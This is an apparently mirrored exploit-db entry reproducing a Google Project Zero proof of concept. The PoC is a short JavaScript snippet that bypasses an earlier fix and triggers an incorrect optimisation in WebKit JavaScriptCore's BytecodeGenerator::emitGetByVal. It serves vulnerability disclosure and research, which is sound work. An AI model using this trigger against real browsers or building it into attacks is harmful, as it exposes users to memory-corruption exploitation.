WebKit JSC – ‘BytecodeGenerator::emitGetByVal’ Incorrect Optimization (2)

  • 作者: Google Security Research
    日期: 2017-10-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42955/
  • <!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319

The following PoC bypasses the fix for theissue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)

PoC:
-->

function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {

}

print(o[i]);
}
}

f();
    PowerShell